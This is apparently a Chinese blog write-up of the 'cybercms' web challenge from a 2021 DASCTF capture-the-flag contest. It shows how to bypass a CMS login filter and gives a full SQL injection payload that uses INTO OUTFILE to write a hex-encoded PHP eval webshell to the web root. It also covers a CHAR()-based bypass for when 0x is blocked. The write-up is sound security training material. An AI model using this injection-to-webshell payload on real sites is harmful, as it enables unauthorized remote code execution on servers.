DASCTF July X CBCTF2021 cybercms WP

最新推荐文章于 2025-07-25 17:39:37 发布
原创 最新推荐文章于 2025-07-25 17:39:37 发布 · 341 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #mysql #数据库 #web安全 #安全

本文介绍了一种CMS网站的安全漏洞利用方法,通过分析后台登录过程中的过滤机制,绕过安全检查并上传恶意代码到服务器。

DASCTF July X CBCTF cybercms

是一个cms网站

常规扫面后台文件

在这里插入图片描述
扫到一个后台登录网页,这个cms请求量大了后还是会503,403的,不过这个admin也没有多难猜

登录测试

输入点号 发现可以报错
在这里插入图片描述
同时尝试/www.zip可以下载源码
在这里插入图片描述
这里会对用户名和密码进行过滤,有两个函数,
第一个,过滤了一些内容 会替换为空,那么双写绕过即可

function fl_value($str){
	if(empty($str)){return;}
	return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/i','',$str);
}

这里过滤了空格,有空格就会判为hacker,然后过滤0x,16进制头

function f1_vvv($str){
	if(empty($str)){return;}
	if(preg_match("/\ /i", $str)){
		exit('Go away,bad hacker!!');
	}
	preg_replace('/0x/i','',$str);
    return $str;
}

那么可以尝试写一句话进服务器
/**/ 可以绕过空格
测试发现有的需要双写绕过 有的则不需要
在这里插入图片描述

payload:adm'/**/union/**/seselectlect/**/1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e/**/into/**/outoutfilefile/**/'/var/www/html/2.php

在这里插入图片描述
访问刚刚上传的一句话 如果显示内容 则上传成功
上传后可以直接连接 找flag
在这里插入图片描述
也可以发参数慢慢找
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

mysql 16 进制写入文件

在这里插入图片描述
在本地测试了一下16进制写入文件
在这里插入图片描述
发现写入直接变字符

0x绕过

0x如果被ban那么可以用char函数
在这里插入图片描述
char 能将十进制转为16进制
将一句话转为ascii码表示
再用char 函数上传

【CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 784
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercmsweb 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
DASCTF 2024暑期挑战赛wp
渗透测试研究中心
10-07 1922
WEB题目:Sanic's revenge解题步骤首先看到给出的附件:from sanic import Sanicimport osfrom sanic.response import text, htmlimport sysimport randomimport pydash# pydash==5.1.2# 这里的源码好像被admin删掉了一些,听他说里面藏有大秘密class Pollute...
cybercms
lastwinn的博客
08-01 179
cybercms 第一步还是先找后台,后台在admin/ /admin/login.php 尝试一波密码发现进不去, 试试admin'发现报错 然后发现有www.zip 备份文件。 对登录框进行了过滤,这边绕了蛮久就不一一写了,直接上payload 最终payload: url:http://67fa4a9d-62c0-45c9-8233-005c57ec0a7d.node4.buuoj.cn/admin/login.php?action=ck_login ​ user=a
DASCTF 上半年赛官方WP
小杉泽的博客
07-19 503
本文总结了多道CTF赛题的详细解题思路和代码实现,涵盖Web安全、逆向工程、密码学和杂项等多个领域。主要内容包括: Web安全部分: 通过Jersey框架路由解析绕过认证机制 利用H2 JDBC RCE漏洞实现命令执行 分析Java反序列化漏洞利用链 PHP单行注释绕过和Redis密码爆破 逆向工程部分: Qt程序逆向和音频文件分析 ARM架构固件分析和漏洞利用 Android Native层Hook和加密算法分析 密码学部分: 针对LZW压缩算法的选择明文攻击 ECDSA签名共用nonce漏洞利用 广义R
2023年楚慧杯(DASCTF)WP
ZJPC007的博客
12-18 1544
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。最后以一题之差屈居第二。
2021 DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th easyjava
m0_62501867的博客
05-02 396
2021 DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th easyjava
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1552
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
DASCTF July X CBCTF 4th web部分WP
weixin_44687621的博客
08-02 415
DASCTF July X CBCTF 4th web部分WP ezrce Yapi远程命令执行漏洞 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。 全局脚本 const san
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th WriteUp
mumuzi的博客
08-02 3679
最后十分钟掉了4名可还行 只写自己做了的,队友出的就不写了 Crypto:Yusa的密码学签到——BlockTrick 不知道啥意思,反正当复读机就行了。 MISC-问卷题 DASCTF{79f3bb47a2e2d46def82c052eccb7b80}
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF Easyheap
yongbaoii的博客
08-30 333
保护是全开。 开了一块空间,这块空间权限都有。 但是下面开了沙箱,ban了execve。 add 正常申请空间,写大小。 但是有个问题,我们输入要申请的空间大小之后,使用了一个strdup函数。 这个函数会根据你的字符串自动申请空间,那么就意味着我可以写0x500的大小,但是只输了一个字节。 就会造成溢出。 delete 清空了。 show 正常输出。 edit 编写。 所以我们整个看下来,存在的问题就是有堆溢出。 那么我们利用这个溢出,首先申请释放一个大的chunk,挂进unsortedbin。 然后通
wpDASCTF Thinkphp 3.2.3RCE复现
这周末在做梦的博客
08-09 2068
一,概述 在我开始这篇博客之前,请允许我说明一下"wp篇"存在的意义——它的存在主要是为了丰富我的“小破站”而存在的,你没听错,我还有一个小破站,如果你想要看看的话,可以私信我。(为什么不公开?因为,我并不是经常维护,而且里面放的题目都需要手动打开…总之就是怕麻烦)。 好了,接下来进入正题。首先给大家推荐这篇漏洞通报 ThinkPHP3.2.x RCE漏洞通报 。 其次,至于DASCTF这道easythinkphp,参加了比赛的都知道怎么回事了,没有参加的也没事,可以根据下面的阐述自己复现(大佬请勿入坑,不
python xlrd对excel文件的读取
xu19950525的博客
10-09 651
XLRD库主要是对文件进行读取,写文件一般用xlwt库,该库遵循 ”读取修改覆盖“ 的原则。 import xlrd # 打开文件 workbook = xlrd.open_workbook('C:/Users/Administrator/Desktop/s4.xlsx') sheet2_name = workbook.sheet_names() # 获取所有sheet名称 prin...
Dasctf web 2道题的wp
Airwooh的博客
08-02 507
就出了两道web 太菜了 总排名44 eur1ka yyds web1 Google 搜了一下 是前几天爆出的一个洞 直接打就出来了 web2 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); .
WebDASCTF 2025上半年赛 wp
最新发布
uuzeray的博客
07-25 1648
第一个过滤com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,即getter的sink。第三个过滤了aop相关类,但org.springframework.aop.target.HotSwappableTargetSource没有被ban。反序列化完后执行命令, 删除/a文件,接着再访问/flag路由获取flag。去读/etc/redis.conf,读到密码为admin123。执行后502,无回显,可将执行结果写入文件再读取。
DASCTF 2024金秋十月赛RE题wp
sln_1550的博客
10-20 1367
3题RE,差一点就AK了,可能好久没打比赛了,技能有所下降,还是需要经常摸一摸工具。
DASCTF2020-7月赛 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 2308
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
DASCTF3月赛re部分wp
n1ptune__的博客
03-27 530
做出两道re,被大佬们带躺了个12 Enjoyit-1 这题送分题 .net程序,用dnspy反编译,主要逻辑如下 b.b检查输入是否在’_'和’z’之间 b.c是一个改表base64 写脚本解出符合条件的输入 import base64 src='abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ=' aaa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
六月DASCTFre方面wp
weixin_43990313的博客
06-28 471
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
DASCTF2022十月挑战赛部分WP
东隅的博客
10-25 1494
DASCTF2022十月挑战赛部分WP.看题目源码,有4个类,开始的时候看到了fine类里面的call_user_func,最终应该是打进这个地方,另外看到了 secret_code 类里面的hint()函数,所以我的想法路线是先想办法调用出这个hint()函数,然后根据给出的hint进入那个call_user_func,然后就开始找链子,但是最终hint()函数给出的东西真是让我摸不到头脑,就只好不管这个hint直接打进call_user_func进行rce了。
iatf-16949-sis-july-2021
10-23
IATF 16949-SIS-July 2021是指国际汽车工作组(IATF)16949标准的最新版本,该版本于2021年7月发布。IATF 16949是汽车行业的质量管理系统要求,它基于国际质量管理标准ISO 9001,并在汽车行业领域进行了特定的更新和...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值